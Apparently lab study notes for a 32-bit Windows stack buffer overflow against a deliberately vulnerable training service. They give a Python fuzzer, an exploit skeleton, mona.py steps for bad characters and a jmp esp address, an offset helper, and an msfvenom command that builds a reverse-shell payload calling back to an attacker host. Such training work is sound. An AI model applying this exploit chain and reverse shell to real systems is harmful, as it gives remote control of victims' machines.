
Stack-Based 32-bit

For this task we use a Windows 7 x64 machine with Immunity Debugger and mona.py installed.

Mona configuration

!mona config -set workingfolder c:\mona\%p

Fuzz to find the vulnerable input

fuzzer.py

# Python 2 script (str is bytes): sends increasingly long strings until the service crashes
import socket, time, sys

ip = "10.10.95.202"
port = 1337
timeout = 5

# Build 30 test strings of 100, 200, ... 3000 bytes
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)  # read the banner
        print("Fuzzing with %s bytes" % len(string))
        s.send("OVERFLOW1 " + string + "\r\n")
        s.recv(1024)
        s.close()
    except:
        # The service stopped answering: the previous length is the crash size
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

Crash Replication & Controlling EIP

exploit.py

# Python 2 script (str is bytes): the skeleton each of the following steps fills in
import socket

ip = "10.10.95.202"
port = 1337

prefix = "OVERFLOW1 "
offset = 0                  # distance to EIP, found with pattern_offset
overflow = "A" * offset     # filler up to the saved return address
retn = ""                   # 4 bytes that land in EIP (jmp esp address, little endian)
padding = ""                # NOPs between the return address and the payload
payload = ""                # msfvenom output
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Create a 600-byte cyclic pattern:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600

Put the output in the payload variable and run the exploit again.

Note the value of EIP at the crash and look up its offset in the pattern:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP>

Verify the offset by setting the retn variable to "BBBB" and checking that EIP is overwritten with those bytes.

Finding Bad Characters

Find the characters the application does not accept in the payload. (REMEMBER TO FILL THE EIP)

!mona bytearray -b "\x00"

Add the generated byte array to the payload variable (without the offset).

Then compare the binary file with the bytes in memory at the address held in ESP:

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP>

Repeat the process, excluding each newly found bad character, until the comparison status reports UNMODIFIED:

!mona bytearray -b "\x00\x07\x2e\xa0"

Note: If the address in ESP does not match the beginning of the payload, pad with NOPs (normally "\x90" * 8).

Finding a Jump Point

Find all "jmp esp" instructions in the modules loaded by the process, excluding the bad characters:

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

Remember: don't forget to exclude the BAD CHARS found.

Log data, item 11
 Address=625011AF
 Message=  0x625011af : jmp esp |  {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\oscp\essfunc.dll)

REMEMBER LITTLE ENDIAN: \x62\x50\x11\xAF (system) -> \xAF\x11\x50\x62 (exploit)

Put the address in the "retn" variable. If EIP equals ESP after the crash, the jump to ESP worked.
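The offset lookup and the little-endian conversion from the two steps above, as an added Python 3 example that re-implements the pattern_create.rb / pattern_offset.rb logic (this is not code from the original notes); the EIP value 64413364 used in the docstring is a constructed sample, the 625011AF address is the one from the mona output above.

```python
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: triplets of upper-case letter,
    lower-case letter and digit, so every 4-byte window is unique within
    the first 20280 bytes (26 * 26 * 10 * 3)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_hex):
    """Offset in the pattern of the 4 bytes that landed in EIP
    (pattern_offset.rb -q). eip_hex is the value as the debugger shows it,
    e.g. "64413364"; the CPU loaded it little endian, so the bytes are
    reversed before searching. Raises ValueError if EIP is not under control."""
    needle = struct.pack("<I", int(eip_hex, 16))  # constructed sample in docstring
    idx = pattern.encode("ascii").find(needle)
    if idx == -1:
        raise ValueError("EIP value not found in pattern: EIP is not (fully) controlled")
    return idx


def to_little_endian(addr_hex):
    """Encode a 32-bit address the way it must appear in the retn variable,
    e.g. 625011AF -> b"\\xaf\\x11\\x50\\x62"."""
    return struct.pack("<I", int(addr_hex, 16))


if __name__ == "__main__":
    pat = pattern_create(600)
    print(pat[:30])
    print("offset:", pattern_offset(pat, "64413364"))
    print("retn:", to_little_endian("625011AF"))
```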

Generate the Payload

We will generate the payload with msfvenom.

Note: Don’t forget to put the previously found bad chars!

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.11.21.203 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f py | sed 's/buf/payload/g'

Hint: With EXITFUNC=thread only the thread is terminated when the reverse shell ends, so the rest of the program keeps running -> NO DoS

Copy the generated payload and integrate it into exploit.py.

Prepend NOPs

The encoded payload needs some room in memory to decode itself. If padding was already added to align the beginning of the payload with ESP, add another 16 NOPs.

padding = "\x90" * 16